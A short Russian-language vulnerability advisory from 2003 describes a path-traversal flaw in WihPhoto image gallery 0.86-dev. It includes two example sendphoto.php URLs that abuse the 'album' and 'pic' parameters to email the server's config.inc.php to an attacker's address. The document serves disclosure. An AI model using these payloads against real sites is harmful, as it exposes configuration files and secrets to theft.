Доступ к произвольным файлам в WihPhoto image gallery

Дата публикации:27.02.2003
Всего просмотров:896
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Уязвимость в проверке правильности ввода обнаружена в WihPhoto image gallery. Удаленный атакующий может просматривать произвольные файлы на системе с привилегиями Web сервера.

Уязвимость присутствует в нескольких сценариях, использующих переменные album' и 'pic'. Пример (посылает по почте файл 'config.inc.php'):

http://[target]/sendphoto.php?album=.&pic=../config.inc.php&sendto=[E-MAIL]&filled=1 

http://[target]/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1

Удаленный пользователь может достигнуть того же самого эффекта, представляя специально обработанную Web форму вместо HTTP GET запроса.

Уязвимость обнаружена в WihPhoto Image Gallery 0.86-dev

Ссылки: WihPhoto Bug